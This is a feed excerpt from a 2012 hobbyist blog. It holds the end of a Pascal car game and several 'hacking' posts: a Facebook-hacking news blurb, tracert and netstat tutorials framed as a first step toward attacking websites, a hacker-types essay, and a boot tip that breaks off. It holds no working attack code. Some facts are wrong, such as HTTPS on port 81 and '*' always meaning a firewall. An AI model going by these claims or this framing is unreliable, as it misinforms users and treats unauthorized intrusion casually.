c:=readkey; &lt;br /&gt;
case c of &lt;br /&gt;
'j':Begin &lt;br /&gt;
car2(365,330); &lt;br /&gt;
car(300,330); &lt;br /&gt;
delay(30); &lt;br /&gt;
car2(300,330); &lt;br /&gt;
car(210,330); &lt;br /&gt;
left:=true; &lt;br /&gt;
right:=false; &lt;br /&gt;
End; &lt;br /&gt;
'l':Begin &lt;br /&gt;
car2(210,330); &lt;br /&gt;
car(300,330); &lt;br /&gt;
delay(30); &lt;br /&gt;
car2(300,330); &lt;br /&gt;
car(365,330); &lt;br /&gt;
right:=true; &lt;br /&gt;
left:=false; &lt;br /&gt;
End; &lt;br /&gt;
'q': Begin &lt;br /&gt;
y1:=450; &lt;br /&gt;
End; &lt;br /&gt;
End; &lt;br /&gt;
End; &lt;br /&gt;
End; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{----------------------------MAIN BODY-----------------------------------} &lt;br /&gt;
Begin &lt;br /&gt;
initgraph(driver,mode,dir); &lt;br /&gt;
setbkcolor(7); &lt;br /&gt;
randomize; &lt;br /&gt;
setcolor(1); &lt;br /&gt;
settextstyle(4,horizdir,7); &lt;br /&gt;
outtextxy(230,90,'MENU'); &lt;br /&gt;
settextstyle(2,horizdir,7); &lt;br /&gt;
outtextxy(100,170,'PRESS THE FOLLOWING KEYS TO PLAY OR QUIT'); &lt;br /&gt;
outtextxy(250,220,'1: START'); &lt;br /&gt;
outtextxy(250,250,'2: QUIT'); &lt;br /&gt;
outtextxy(240,310,'DURING GAME'); &lt;br /&gt;
outtextxy(180,360,'TO TURN CAR LEFT PRESS J'); &lt;br /&gt;
outtextxy(180,390,'TO TURN CAR RIGHT PRESS L'); &lt;br /&gt;
outtextxy(180,420,'PRESS Q TO QUIT'); &lt;br /&gt;
menu:=readkey; &lt;br /&gt;
while keypressed =true do &lt;br /&gt;
Begin &lt;br /&gt;
menu:=readkey; &lt;br /&gt;
End; &lt;br /&gt;
Case menu of &lt;br /&gt;
'1':Begin &lt;br /&gt;
cleardevice; &lt;br /&gt;
setbkcolor(black); &lt;br /&gt;
setcolor(green); &lt;br /&gt;
rectangle(0,0,160,480); &lt;br /&gt;
setfillstyle(1,green); &lt;br /&gt;
floodfill(100,30,green); &lt;br /&gt;
rectangle(480,0,640,480); &lt;br /&gt;
setfillstyle(1,green); &lt;br /&gt;
floodfill(500,400,green); &lt;br /&gt;
setcolor(white); &lt;br /&gt;
car(210,330); &lt;br /&gt;
car2(365,330); &lt;br /&gt;
left:=true; &lt;br /&gt;
crash:=false; &lt;br /&gt;
Repeat {--------------MAIN LOOP-----------------} &lt;br /&gt;
y1:=0; &lt;br /&gt;
y2:=25; &lt;br /&gt;
lan1:=0; {MIDDLE LANE} &lt;br /&gt;
lan2:=50; {MIDDLE LANE} &lt;br /&gt;
left1:=160; &lt;br /&gt;
left2:=170; &lt;br /&gt;
right1:=470; &lt;br /&gt;
right2:=480; &lt;br /&gt;
moder:=0; &lt;br /&gt;
s1:=200; &lt;br /&gt;
s2:=275; &lt;br /&gt;
s3:=360; &lt;br /&gt;
s4:=435; &lt;br /&gt;
r1:=110; &lt;br /&gt;
r2:=120; &lt;br /&gt;
chan:=random(20); &lt;br /&gt;
Repeat &lt;br /&gt;
moder:=moder+1; &lt;br /&gt;
option; &lt;br /&gt;
sides1(left1,y1,left2,y2,moder); {left side} &lt;br /&gt;
sides1(right1,y1,right2,y2,moder);{right side} &lt;br /&gt;
lane1(lan1,lan2,moder); &lt;br /&gt;
delay(5); &lt;br /&gt;
sides2(left1,y1,left2,y2,moder); {Left side alternate} &lt;br /&gt;
sides2(right1,y1,right2,y2,moder); {Right side alternate} &lt;br /&gt;
lane2(lan1,lan2,moder); &lt;br /&gt;
Case chan of &lt;br /&gt;
0,1,2:Begin &lt;br /&gt;
if r1&amp;lt;470 then &lt;br /&gt;
obst1; &lt;br /&gt;
if (r1=470)and (left=true) then &lt;br /&gt;
Begin &lt;br /&gt;
crash:=true; &lt;br /&gt;
End; &lt;br /&gt;
r1:=r1+120; &lt;br /&gt;
r2:=r1+10; &lt;br /&gt;
End; &lt;br /&gt;
5,6,7:Begin &lt;br /&gt;
if r1&amp;lt;470 then &lt;br /&gt;
obst2; &lt;br /&gt;
if (r1=470)and (right=true) then &lt;br /&gt;
Begin &lt;br /&gt;
crash:=true; &lt;br /&gt;
End; &lt;br /&gt;
r1:=r1+120; &lt;br /&gt;
r2:=r1+10; &lt;br /&gt;
End; &lt;br /&gt;
End; &lt;br /&gt;
lan1:=lan1+50; &lt;br /&gt;
lan2:=lan1+50; &lt;br /&gt;
y1:=y1+25; &lt;br /&gt;
y2:=y1+25; &lt;br /&gt;
option; &lt;br /&gt;
If lan1=450 then &lt;br /&gt;
Begin &lt;br /&gt;
lan1:=0; &lt;br /&gt;
lan2:=50; &lt;br /&gt;
End; &lt;br /&gt;
Until(y1=450)or(crash=true); &lt;br /&gt;
Until(c='q')or(crash=true); &lt;br /&gt;
cleardevice; &lt;br /&gt;
setbkcolor(cyan); &lt;br /&gt;
If crash= true then &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(red); &lt;br /&gt;
settextstyle(2,horizdir,10); &lt;br /&gt;
outtextxy(220,220,'GAME OVER'); &lt;br /&gt;
outtextxy(100,280,'THANK YOU FOR PLAYING'); &lt;br /&gt;
readkey; &lt;br /&gt;
End; &lt;br /&gt;
if c='q' then &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(red); &lt;br /&gt;
settextstyle(2,horizdir,8); &lt;br /&gt;
outtextxy(150,220,'YOU HAVE CHOSEN TO QUIT'); &lt;br /&gt;
readkey; &lt;br /&gt;
End; &lt;br /&gt;
End; &lt;br /&gt;
'2':Begin &lt;br /&gt;
cleardevice; &lt;br /&gt;
setbkcolor(cyan); &lt;br /&gt;
setcolor(red); &lt;br /&gt;
settextstyle(2,horizdir,8); &lt;br /&gt;
outtextxy(150,220,'YOU HAVE CHOSEN TO QUIT'); &lt;br /&gt;
readkey; &lt;br /&gt;
End; &lt;br /&gt;
End; &lt;br /&gt;
End.</description><link>http://programmelk.blogspot.com/2012/03/how-to-create-car-game-souce-code-only.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-7925225254231628093</guid><pubDate>Fri, 02 Mar 2012 01:52:00 +0000</pubDate><atom:updated>2012-03-01T17:52:39.538-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>How To Hack Facebook In 51 Seconds</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAw47iaoUKheRvBclNfnMhPcdUMygoHE3uSC_7F_Kt-bYmgOUoKgRrQ7_wa7nmAIoLMr5D17NT6AOXUucRy1Oc0fyhx2VsqiQQWPi8KWnY-Jq69YYxLswIOw7lRYOw9RT0kKupNf0H9vA/s320/how-to-hack-facebook-account1.jpg" width="320" /&gt;&amp;nbsp;&lt;/div&gt;So &lt;a href="http://www.alleyinsider.com/2008/3/byron_ng_i_m_not_a_hacker_i_m_just_good_with_the_media"&gt;Byron  Ng isn't a real Facebook hacker&lt;/a&gt;. But apparently it isn't hard to  become one, if you've got any technical skills at all. Hacking Facebook  is a &lt;a href="http://www.news.com/8301-10784_3-9904331-7.html?part=rss&amp;amp;tag=feed&amp;amp;subj=NewsBlog"&gt;cottage  industry&lt;/a&gt;, with hundreds or thousands of unpaid workers beavering  away. The video below shows how to monkey with your friends "Moods" app  -- &lt;b&gt;in less than 1 minute&lt;/b&gt;.&lt;br /&gt;
Right now the worst  case-scenario for Facebook apps usually means someone's private photos  get exposed -- and even the most gullible Facebook user there's no such  thing as true privacy on the Web. (Right?) But as Facebook gets more  ambitious -- see its upcoming PayPal-like currency -- that's going to  change.&lt;br /&gt;
Is Facebook easier to hack than other sites of similar  size? How about compared to other social networks? And if so, what  should Zuckerberg &amp;amp; Co. do about it? Let us know in comments.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/w65s1iyXqLo" width="420"&gt;&lt;/iframe&gt;&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/how-to-hack-facebook-in-51-seconds.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAw47iaoUKheRvBclNfnMhPcdUMygoHE3uSC_7F_Kt-bYmgOUoKgRrQ7_wa7nmAIoLMr5D17NT6AOXUucRy1Oc0fyhx2VsqiQQWPi8KWnY-Jq69YYxLswIOw7lRYOw9RT0kKupNf0H9vA/s72-c/how-to-hack-facebook-account1.jpg" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-502537873374230037</guid><pubDate>Thu, 01 Mar 2012 14:33:00 +0000</pubDate><atom:updated>2012-03-01T06:33:20.992-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>TRACING A IP ADDRESS</title><description>&lt;div class="separator" style="clear: both; color: black; text-align: center;"&gt;&lt;img border="0" height="220" src="http://img.ehowcdn.com/article-page-main/ehow/images/a06/ub/e8/trace-ip-address-skype-call-800x800.jpg" width="225" /&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; color: black; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;i&gt;&lt;b&gt;TRACING IP ADDRESS&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;/span&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt; I know many of u know dis thing,tracing some1 but i vl tell  u here many new nd exiting ways.&lt;br /&gt;
let's start.&lt;/span&gt;&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;First of all,vat is d need we have 2 trace  any1?&lt;br /&gt;
see,suppose dt u vant 2 hack anywebsite or 2 any person then d most imp.  thing is 2 get his ip address.&lt;/span&gt;&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;Untill d moment u vl nt be knowing his id  address how can u do anything?&lt;/span&gt;&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;Here i vl teach u only tracing ip address.  attacks vl come in future.&lt;/span&gt;&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;Let's start ,be prepared 4 knowing many new  ways 2 trace any1.&lt;br /&gt;
&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&amp;gt;&amp;gt; Click on start&amp;gt;run&amp;gt;type cmd&amp;gt;hit enter&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;br /&gt;
write&lt;br /&gt;
tracert websitename&lt;br /&gt;
hit enter&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;Now some information vl come automatically&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;U vl  see written der[mind written in blue clr]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;Tracing  route 2 wensite name[ip address of d website]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
nd then many more things.&lt;br /&gt;
yes nw u successfully got d ip address of d website.it is really very  easy.&lt;br /&gt;
d  line vch i hv written in blue clr vl be d first line automatically  came  nd in dt first line u may see d ip address of d website.now in  second  line u vl see written.&lt;br /&gt;
over a maximum hops of 30&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;Explanation  of hopes &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para" style="color: black;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="color: black; font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;See,wenever u open any  website u  just send some data 2 dt website 4 vch dt website replies u  nd den u  send some data gain nd dis process continues ,nw suppose dt  after of  writing tracert google.com ,ur data packets reached 2  google.com ,now  google vl try 2 reply u,bcoz google is a very big  website ,it take help  of many servers ,replies 4m google vl come 4m  dese servers .&lt;br /&gt;
now look  at ur command prompt.der u can see written tracing vd a  maximum of 30  hopes.here u r getting ip address of d servers 4m vch  datas r processing  2 u .&lt;br /&gt;
here u vl see * dis sign in some places,here they have fixed firewall,so  dt u cann't attack easily.&lt;br /&gt;
written  * means der is a firewall,bcoz tracing any1 is very easy,der4  de  webmaster fix some firewalls so dt no1 ud be able 2 attack on dem   properly.&lt;/span&gt;&lt;/span&gt;&lt;div class="separator" style="clear: both; color: black; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: black;"&gt;&lt;br /&gt;
&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/tracing-ip-address.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-7682501046094193556</guid><pubDate>Thu, 01 Mar 2012 14:31:00 +0000</pubDate><atom:updated>2012-03-01T06:31:23.884-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>IP ADDRESS</title><description>&lt;div class="separator" style="clear: both; color: black; text-align: center;"&gt;&lt;img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUSt686TNJi6qDvI0K7_diINkAXnJnSTba85kpzYYpxRwC7phyphenhyphenyWhFWC6rSfrF-JkliT_Jr5Ag6r9db1DqPqhPfUVtLLxysTExM3oPUEXQhRM2_OQW3aNBNYueoux9krTmkqcoenoN07ZY/s320/ip-adresse.png" width="320" /&gt;&amp;nbsp;&lt;/div&gt;&lt;div dir="ltr" style="color: black; text-align: left;" trbidi="on"&gt;&lt;div&gt;&lt;span style="font-family: Century Gothic;"&gt;&lt;span style="font-family: Century Gothic;"&gt;&lt;span style="font-family: Century Gothic;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;i&gt;&lt;b&gt;EXPLOITING IP ADDRESS&lt;/b&gt;&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;
IP ADDRESS STANDS for internet protocol address.&lt;br /&gt;
your  ip address is d unique address on vch data r sent 2 you. ur  internet  service provider make hiMself sure dt datas r going 2 u bcoz  he is  sending data on d address specialy assigned 2 you.&lt;br /&gt;
&lt;br /&gt;
1)Getting ur own ip address----&amp;gt;&lt;br /&gt;
&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Century Gothic;"&gt;&lt;span style="font-family: Century Gothic;"&gt;&lt;span style="font-family: Century Gothic;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&amp;gt; Click on  start,go on run,open run type cmd hit enter a command prompt vl appear&lt;br /&gt;
&amp;gt; Write der&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; netstat -n&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; nd hit enter&lt;br /&gt;
&amp;gt; A list vl appear..look at local address .d first local address is  ur ip address.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Century Gothic;"&gt;&lt;span style="font-family: Century Gothic;"&gt;&lt;span style="font-family: Century Gothic;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&amp;gt;&amp;gt; D second method 2 get ur ip address  is open&lt;br /&gt;
whatismyip.com&lt;br /&gt;
on dis site u may easily know ur ip address.&lt;br /&gt;
NOTE : Writing netstat is more good dis command tells about all ip  address vch r connected 2 u dis moment. &lt;br /&gt;
memorize dis small list&lt;br /&gt;
ftp----&amp;gt;21&lt;br /&gt;
smtp---&amp;gt;25&lt;br /&gt;
dns----&amp;gt;53&lt;br /&gt;
http---&amp;gt;80&lt;br /&gt;
https----&amp;gt;81&lt;br /&gt;
pop3----&amp;gt;110&lt;br /&gt;
telnet---&amp;gt;23&lt;br /&gt;
these r port no.s.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; color: black; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: black;"&gt;&lt;br /&gt;
&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/ip-address.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUSt686TNJi6qDvI0K7_diINkAXnJnSTba85kpzYYpxRwC7phyphenhyphenyWhFWC6rSfrF-JkliT_Jr5Ag6r9db1DqPqhPfUVtLLxysTExM3oPUEXQhRM2_OQW3aNBNYueoux9krTmkqcoenoN07ZY/s72-c/ip-adresse.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-6757088159542202002</guid><pubDate>Thu, 01 Mar 2012 14:29:00 +0000</pubDate><atom:updated>2012-03-01T17:55:03.137-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>Hacking......</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9RL9ae03UFtGE-iXELlWBwh_0i6hQu7XXCD3RYertfl4RdVBOuvJYCXFnNu6RN5W2QGA31go7F2APe6eSH1G0qD3KhUmFGvuUgyusQ-7KOo_yf97ER0uj1bItFeOIJSojGRTF7LVZLsw/s320/2.jpg" width="320" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div dir="ltr" style="color: black; text-align: left;" trbidi="on"&gt;&lt;div class="para" dir="ltr" style="margin-right: 0px;"&gt;&lt;b&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;FIRST  OF ALL WAT  IS HACKING ?&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="para" dir="ltr" style="margin-right: 0px;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt; # HACKING IS NOTHING BT BREACHING IN TO A  COMPUTER OR IN A  SYSTEM OR IN A SOFTWARE RELATED&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para" dir="ltr" style="margin-right: 0px;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&amp;nbsp;THING,IN VCH  ACCESS IS  NT PUBLIC..HACKING MEANS GETTING ND MAINTAINING ACCESS IN A  CYBER PLACE  WHERE U DONT HAVE RIGHTS 2 ENTER.&lt;/span&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para" dir="ltr" style="margin-right: 0px;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;br /&gt;
SEEM INTERNET  IS  NT VERY OLD IN DIS WORLD.IT CAME 2 PUBLIC IN 1989 IN YOROPE ND IN   U.S.A. ND IN DEVELOPED CONUTRIES ND IN INDIA IT CAME IN 1992.&lt;br /&gt;
ACTUALY  INTERNET  HAS COME B4 OF MANY YEARS BT USING AT PUBLIC LEVEL ,USING AT A  GENERAL  HUMAN LEVEL HAS BEEN STARTED IN D YEAR ,IN VCH I HV WRITTEN .&lt;br /&gt;
NOW U MAY THINK  INTERNET IS NT VERY MUCH OLD.&lt;br /&gt;
NOW  TYPES OF HACKERS----&amp;gt;MOST OF D PPL THINK  THEY R OF 2 TYPES.ONE IS  ETHICAL HACKERS ND D SECOND 1 IS UNETHICAL  HACKER..NO,DTS NT TRUE.&lt;br /&gt;
IN REALITY.HACKERS R OF 3 TYPES.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;span style="font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;b&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;FIRST&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;WHITE  HAT  HACKERS&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="para"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&amp;gt;THEY R ETHICAL HACKERS.THEY JUST WORK AS A  SECURITY  EXPERT IN ANY BANK/SOCIETY/ONLINE COMPANY.&lt;br /&gt;
THEY JUST FIND   VULNERABILITIES ND POSSIBLE ATTACK IN A SYSTEM ND MAKE DT SYSTEM MOR3E   SECURE.THEY HAVE PERMISSION 2 MAKE TESTING OF VULNERABILITIES IN D   SYSTEM ND DE DO DERSELF ATACK ND TELL VAT IS D VULNERABILITY.THEY R   ETHICAL HACKERS ND NEVER HARM ANYTHING .&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;SECOND  TYPE&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;BLACK  HAT HACKERS&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="para"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&amp;gt;  THEY R UNETHICAL HACKERS.THEY JUST  FUCK ANY ONLINE SYSTEM.THEY DO IT 4  FUN OR MONEY.IT MA SEEM VERY FUNNU  BT APART OF FUN ND MONEY THERE IS  NO3RD ISSUE 4 VCH HACKING IS DONE.&lt;br /&gt;
&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;b&gt;THIRD  TYPE&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;RED/GREY HAT HACKER&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="para"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&amp;gt;THEY R D PERSON WHO DO HACKING 4  MONEY  .IF U VL PAY THEM MONEY THEY VL SECURE YEW COMPANY IF U VL PAY  THEM  MONEY THEY VL HARM ANY WEBSITE OR VATEVER U VL SAY 2 THEM 2 DO.&lt;br /&gt;
&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;&lt;span style="font-family: Century Gothic; font-size: 10pt;"&gt;AS  I TOLD U  PREVIOUSLY THERE R 3 TYPES OF HACKERS BT IN GENERAL SENSES,IN  PUBLIC  LAUNGUAGE THEY THINK THERE R 2 TYPES 1 IS HACKER ND S SECOND 1 IS   CRACKER.&lt;br /&gt;
WHO  IS A HACKER----&amp;gt;NOW THESE LINES R GOING 2 SHAKE UR  MIND ABOUT UR  CONCEPT OF HACKERS.A HACKER IS A PERSON WHO ONLY SEARCH ND  FIND  VULNERABILITIES IN A SYSTEM .HE DOES NT HARM IT .A HACKER IS  GENERALY A  PROGRAMMER WHO IS ONLY INTERESTED IN SEARCHING BUGS IN A  ONLINE  SYSTEM.THEY R PROGRAMMERS ND GENERALLY WRITE THERE OWN PROGRAAME 2   SEARCH NEW HOLES.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/first-of-all-wat-is-hacking-hacking-is.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9RL9ae03UFtGE-iXELlWBwh_0i6hQu7XXCD3RYertfl4RdVBOuvJYCXFnNu6RN5W2QGA31go7F2APe6eSH1G0qD3KhUmFGvuUgyusQ-7KOo_yf97ER0uj1bItFeOIJSojGRTF7LVZLsw/s72-c/2.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-8342210757848651345</guid><pubDate>Thu, 01 Mar 2012 14:28:00 +0000</pubDate><atom:updated>2012-03-01T06:28:23.391-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>How to bootup computer in 10 seconds lesser?</title><description>&lt;h3 class="post-title entry-title" style="background-color: white; color: #0066cc; margin: 0.25em 0px 0px; padding: 0px 0px 4px;"&gt; &lt;/h3&gt;&lt;div class="post-header-line-1" style="background-color: white; color: #333333;"&gt; &lt;/div&gt;&lt;div class="post-body entry-content" style="background-color: white; color: #333333;"&gt; &lt;div style="line-height: 1.6em; margin-bottom: 0.75em;"&gt; 1) Locate the key"Startup Delay" and double click on it.1) Press Windows  Key and "R" to launch the run 